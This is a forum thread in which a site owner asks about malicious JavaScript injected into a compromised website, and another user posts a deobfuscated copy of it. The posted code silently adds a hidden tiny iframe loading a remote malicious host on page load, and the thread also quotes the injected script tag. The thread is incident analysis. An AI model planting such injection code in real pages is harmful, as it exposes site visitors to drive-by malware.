Javascript Malware

Discussion in 'Software' started by schmoove, Mar 12, 2011.

  1. schmoove

    schmoove Private E-2

    Hello all,

    My web-server has recently been compromised and malicious JavaScript code has been injected into one of my websites like so:

    <script src="http://prstat.in/3">

    I am hoping to find someone here who could examine the above code, which I have pasted here for easy safe viewing: http://pastebin.com/6BRV8Rca - please do not try to execute the code in any way, as it could be harmful.

    I am interested to know the intention of this code and what it does and under what conditions. I am familiar with JavaScript, but my knowledge goes beyond this code. Any help would be much appreciated. Any hints on how I could help myself would be just as good :)

    Further information on the mentioned above domain hosting the code can be found at the Google "Safe Browsing" Diagnostic page for prstat.in

    Thank you for any help
     
    Last edited by a moderator: Mar 13, 2011
    schmoove, Mar 12, 2011
    #1
  2. PC-XT

    PC-XT Master Sergeant

    That happened to me, once. My host had it off my site in a few hours. I included a script that checked to make sure it was first in some browsers as a safety measure.

    The script you gave used obfuscation to make it hard to read. Luckily, I don't care. Here it is, with my attempt to remove obfuscation so it is hopefully easier to understand:
    Code:
    function ehide(){
   var e=document.getElementById("tmp_div1");
   e.style.visibility="hidden";
};

function listener(){
   var e=document.createElement("DIV");
   e.id="tmp_div1";
   setTimeout("ehide();",1000);
   document.body.appendChild(e);
   e.innerHTML="&lt;
   iframe src='ht____tp://slp6.co.cc/forum.php?tp=c9884693c57b61aa' width=19 height=19 frameborder=0 scrolling='no'&gt;&lt;/iframe&gt;";
};

if(document.addEventListener){
   document.addEventListener("DOMContentLoaded",listener,false);
}else{
   document.write('<script id=__ie_onload defer src=javascript:void(0)><\/script>');
   var script=document.getElementById("__ie_onload");
   script.onreadystatechange=function(){if(this.readyState=="complete"){listener();}
};
}
    I added the underscores in what was 'http://' in the iframe code so someone wouldn't accidentally click it. I can't download the file it refers to, as it says unknown error, but it could be anything.
     
    PC-XT, Mar 13, 2011
    #2
  3. PC-XT

    PC-XT Master Sergeant

    Last edited: Mar 13, 2011
    PC-XT, Mar 13, 2011
    #3

MajorGeeks.Com Menu

Downloads All In One Tweaks \ Android \ Anti-Malware \ Anti-Virus \ Appearance \ Backup \ Browsers \ CD\DVD\Blu-Ray \ Covert Ops \ Drive Utilities \ Drivers \ Graphics \ Internet Tools \ Multimedia \ Networking \ Office Tools \ PC Games \ System Tools \ Mac/Apple/Ipad Downloads

Other News: Top Downloads \ News (Tech) \ Off Base (Other Websites News) \ Way Off Base (Offbeat Stories and Pics)

Social: Facebook \ YouTube \ Twitter \ Tumblr \ Pintrest \ RSS Feeds